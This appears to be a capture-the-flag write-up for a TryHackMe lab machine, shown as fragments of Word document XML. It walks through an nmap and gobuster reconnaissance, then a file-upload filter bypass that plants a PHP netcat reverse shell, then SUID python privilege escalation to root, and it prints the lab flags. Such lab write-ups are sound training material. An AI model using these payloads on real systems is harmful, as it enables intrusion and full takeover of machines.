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Date: March 26th, 2026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By: Denishcawilna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to TryHackMe network and deploy the machine. If you don't know how to do this, complete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OpenVPN room</w:t>
        </w:r>
      </w:hyperlink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the questions below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 Need Answer)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Deploy the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2: Reconnaissance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let's get information about the target.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 the questions below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 the machine, how many ports are open?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 Nmap scan here  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:shd w:fill="cccccc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -A -sV [IP_MACHINE]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  and we can answer the first 3 questions at once now.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version of Apache is running?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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.41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service is running on port 22?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60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4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directories on the web server using the GoBuster tool.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  <w:t xml:space="preserve">Look for it with GoBuster </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:shd w:fill="d9d9d9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster dir -u [IP_MACHINE] -w [path to wordlist]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use common.txt wordlists for this so i type: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gobuster dir -u 10.48.168.20 -w /usr/share/dirb/wordlists/common.txt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hidden directory?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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/panel/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Why panel? Because the name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/panel/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> usually suggests an administrative area or a control dashboard.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9195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4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 : Getting a shell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form to upload and get a reverse shell, and find the flag.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questions below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User.txt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reverse engineering file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I’ve tried to upload a .php file but it declined and showed an error. So, i tried to upload another type of file and turns out that the upload feature accepts .py, .php5, and .html file format.</w:t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I saved this code to a .php5 file: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&lt;?php</w:t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exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc [your_ip]  [your_port] &gt;/tmp/f');</w:t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?&gt;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[IP_MACHINE]/panel/ and upload it.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[IP_MACHINE]/uploads/ and check if the php5 file is uploaded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netcat: nc -nlvp [your_port]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php5 file in [IP_MACHINE]/uploads/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you have the shell, so look for the user.txt file:</w:t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find / -type f -name “user.txt”</w:t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cat /var/www/user.txt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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">THM{y0u_g0t_a_sh3ll}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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="24996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38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4: Privilege escalation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a shell, let's escalate our privileges to root.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questions below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for files with SUID permission, which file is weird?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/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find / -type f -perm -4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/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  <w:t xml:space="preserve">The ‘weird’ file here could be /usr/bin/python2. 7. Why? Because that file is exploitable and can be used for privilege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Ans:  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/python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 form to escalate your privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:spacing w:after="240" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="980000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980000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">//gtfobins.github.io/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oot.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Copy and paste this section to your shell:</w:t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python -c 'import os; os.setuid(0); os.execl("/bin/sh", "sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Test it by typing whoami and make sure that you are a root by now.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Now, look for the root.txt file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/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find / -type f -name “root.txt”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cat /root/root.txt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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">THM{pr1v1l3g3_3sc4l4t10n}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958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40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tryhackme.com/room/openvpn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